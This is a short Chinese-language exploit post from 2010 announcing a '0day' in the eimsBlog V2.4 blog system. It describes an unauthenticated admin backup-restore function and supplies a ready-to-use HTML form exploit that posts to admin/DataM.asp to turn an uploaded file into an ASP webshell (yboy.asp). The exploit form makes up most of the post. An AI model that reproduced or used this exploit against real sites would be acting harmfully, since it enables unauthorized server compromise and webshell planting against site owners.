eimsBlog系统V2.4 0day漏洞

发布日期：2010-12.06
发布作者：yboy

影响版本：ALL Version
官方地址：http://www.eims.org.cn/

漏洞类型：设计缺陷
漏洞描述：后台备份功能缺少验证，导致本地提交备份恢复shell.asp

 

漏洞测试exp:

<table width="98%" border="0" cellspacing="1" cellpAdding="1" align="center" class="table">  <form method="post" action="url/admin/DataM.asp?eims=Data&Action=bfstart">     <tr><td colspan="2"><div class="title">eimsBlog系统Pday By yboy</div></td></tr>  <tr><td colspan="2"><font color="red">先上传，shell在当前目录</font></td></tr>  <tr><td width="20%" align="right">webshell地址：</td>  <td><input name="olddata" type="text" id="olddata" value="" size="<% =InputSize %>" ></td></tr>  <tr><td align="right">名称：</td>  <td><input name="newdata" type="text" id="newdata" size="<% =InputSize %>" value="yboy.asp"></td></tr>  <tr><td align="right"></td><td><input type="submit" name="Submit" value="fuck" /></td></tr>  </form>  </table> 

 

标签分类： 脚本漏洞